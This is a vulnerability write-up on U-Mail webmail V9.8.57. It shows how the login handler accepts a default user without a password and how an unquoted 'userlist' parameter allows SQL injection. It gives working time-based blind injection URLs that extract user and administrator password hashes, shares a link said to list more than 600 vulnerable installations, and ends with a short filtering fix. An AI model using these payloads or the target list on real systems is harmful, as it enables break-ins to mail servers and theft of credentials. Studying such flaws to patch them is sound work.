An interface vulnerability in the U-Mail system (SQL injection is supported. Attackers can log on to the system and obtain the administrator password)

Source: Internet
Author: User


With so many installations of this mail system out there, a getshell is only minutes away, which is a headache.

1. Email system introduction

1) Official site: http://www.comingchina.com/html/downloads/

2) Version: the latest version, V9.8.57

3) Test environment: Windows Server 2003 + IIS 6.0 + official default installation

4) Cases: http://www.comingchina.com/html/case/ or Google "Powered by U-Mail"

Download link for the vulnerable code (with more than 600 URLs): http://pan.baidu.com/s/1nQRzo password: ld5k

/Fast/oab/module/operates.php

```php
if (ACTION == "save-to-pab") {
    include_once(LIB_PATH . "PAB.php");
    $PAB = PAB::getInstance();
    $maillist_id = trim($_GET['maillist']);
    if ($maillist_id) {
        $member_all = $Maillist->getMemberByMaillistID($maillist_id, "Mailbox,FullName", 0);
        if (!$member_all) {
            dump_json(array("status" => TRUE, "message" => ""));
        }
        foreach ($member_all as $member) {
            if (!$PAB->getContactByMail($user_id, $member['Mailbox'], "contact_id", 0)) {
                $data = array(
                    "user_id"    => $user_id,
                    "fullname"   => $member['FullName'],
                    "pref_email" => $member['Mailbox'],
                    "updated"    => date("Y-m-d H:i:s"),
                );
                $res = $PAB->add_contact($data, 0);
                if (!$res) {
                    dump_json(array("status" => FALSE, "message" => "An error occurred while adding the contact. Adding failed!"));
                }
            }
        }
    } else {
        // No maillist submitted: fall back to the userlist parameter
        $user_ids = trim($_GET['userlist']);
        if (!$user_ids) {
            dump_msg("param_error", "parameter error!");
        }
        // The raw parameter is concatenated into the WHERE clause without single quotes
        // and without any validation, so $where is built straight from user input
        $where = "t1.UserID IN (" . $user_ids . ")";
        $arr_tmp = $Mailbox->getMailboxInfo($domain_id, $where, "", "", 0);
        $user_all = $arr_tmp['data'];
        if (!$user_all) {
            dump_json(array("status" => TRUE, "message" => ""));
        }
        // ... rest of the handler
    }
}
```



Function file

/Admin/lib/Mailbox.php code

```php
// Local variable names are obfuscated in the shipped code; descriptive names are used here
public function getMailboxInfo($domain_id, $where = "", $page = "", $page_size = "", $order_by = "", $desc = FALSE, $debug = FALSE)
{
    $domain_id = intval($domain_id);
    $where_sql = "t1.DomainID='" . $domain_id . "' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0";
    if ($where) {
        // The caller's where fragment is concatenated directly and the SQL is executed as-is
        $where_sql .= " AND " . $where;
    }
    $offset = 0;
    $limit_sql = "";
    if ($page_size) {
        if ($page) {
            $offset = $page * $page_size - $page_size;
        }
        if ($offset) {
            $limit_sql = "LIMIT " . $offset . "," . $page_size;
        } else {
            $limit_sql = "LIMIT " . $page_size;
        }
    }
    if ($order_by) {
        $order_sql = "ORDER BY " . $order_by;
        if ($desc) {
            $order_sql .= " DESC";
        }
        $order_sql .= ",t1.FullName ASC";
    } else {
        $order_sql = "ORDER BY t1.OrderNo DESC,t1.Mailbox ASC";
    }
    $sql = "SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*\r\n\t\tFROM "
         . $this->get_table_name("mailbox") . " as t1," . $this->get_table_name("info") . " as t2\r\n\t\tWHERE "
         . $where_sql . "\r\n\t" . $order_sql;
    $sql_limited = $sql . " " . $limit_sql;
    if ($debug) {
        dump($sql_limited);
    }
    $count = $this->db_count($sql);
    $data = $this->db_select($sql_limited, "More");
    return array("count" => $count, "data" => $data);
}
```



No login is needed: the mail system ships with a default user, and the login handler does not verify the user's password. Submitting just the user name is enough for the login to succeed, after which a series of operations can be performed. Send a POST to

http://mail.fuck.com/webmail/fast/index.php?module=operate&action=login

with the following data:

mailbox=[email protected]&link=

The login succeeds. Although no page is displayed, all functions can now be executed.

Then request:

http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=save-to-pab&userlist=if(ascii(substr((select password from userlist where FullName=0x73797374656D),1,1))=97,sleep(5),1)

The executed SQL statement, as recorded in the MySQL general log, is:

```
150121 20:11:25    2263 Connect   umail@localhost on
                   2263 Query     SET NAMES 'UTF8'
                   2263 Init DB   umail
                   2263 Query     SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
        FROM userlist as t1, mailuserinfo as t2
        WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (if(ascii(substr((select password from userlist where FullName=0x73797374656D),1,1))=97,sleep(5),1))
        ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
```

View the response (screenshot).

Next, read the administrator password, which gives control over all users and mailboxes. The management table is web_usr.

Single quotes cannot be used in the exploit, so the payloads for the admin and administrator accounts are:

http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=save-to-pab&userlist=if(ascii(substr((select password from web_usr where role_code=1),1,1))=97,sleep(5),1)

http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=save-to-pab&userlist=if(ascii(substr((select password from userlist where role_code=2),1,1))=97,sleep(5),1)

Solution:

Filter the submitted id list with the system's own id_list_filter() function before it is concatenated into the WHERE clause.
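As an added example of the proposed fix (not code from U-Mail or from the original write-up), the block below assumes id_list_filter() whitelists the userlist parameter down to positive integers, shows the IN (...) fragment being built only from that filtered list, and adds a placeholder-based variant for PDO code paths:

```php
<?php
// Added example, not U-Mail's own code. The write-up recommends the system's
// id_list_filter(); the implementation here is an assumed one, not the vendor's.

// Reduce a user-supplied comma-separated id list to positive integers only.
// Anything that is not a plain run of digits (such as the if(...sleep(5)...)
// payload above) is dropped, so only digits and commas can reach the SQL text.
function id_list_filter(string $ids): array
{
    $clean = array();
    foreach (explode(',', $ids) as $id) {
        $id = trim($id);
        // ctype_digit() rejects signs, spaces, quotes, parentheses and function calls
        if ($id !== '' && ctype_digit($id) && (int) $id > 0) {
            $clean[] = (int) $id;
        }
    }
    return array_values(array_unique($clean));
}

// Build the same "t1.UserID IN (...)" fragment the vulnerable handler builds, but
// from the filtered list. Returns null when nothing valid remains, so the caller
// can reuse the existing dump_msg("param_error", ...) path instead of querying.
function build_userid_where(string $user_ids): ?string
{
    $ids = id_list_filter($user_ids);
    if (count($ids) === 0) {
        return null;
    }
    return 't1.UserID IN (' . implode(',', $ids) . ')';
}

// Parameterised alternative for PDO code paths: one "?" per id, with the ids
// handed to PDOStatement::execute() instead of being concatenated.
function build_userid_in(array $ids): array
{
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    return array('t1.UserID IN (' . $placeholders . ')', $ids);
}

// Normal address-book input versus the time-based payload from the write-up
// (constructed sample input).
$payload = 'if(ascii(substr((select password from userlist where FullName=0x73797374656D),1,1))=97,sleep(5),1)';
var_dump(build_userid_where('3,4,5,4'));
var_dump(build_userid_where($payload));
list($sql_fragment, $params) = build_userid_in(id_list_filter('3,4,5'));
var_dump($sql_fragment, $params);
```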
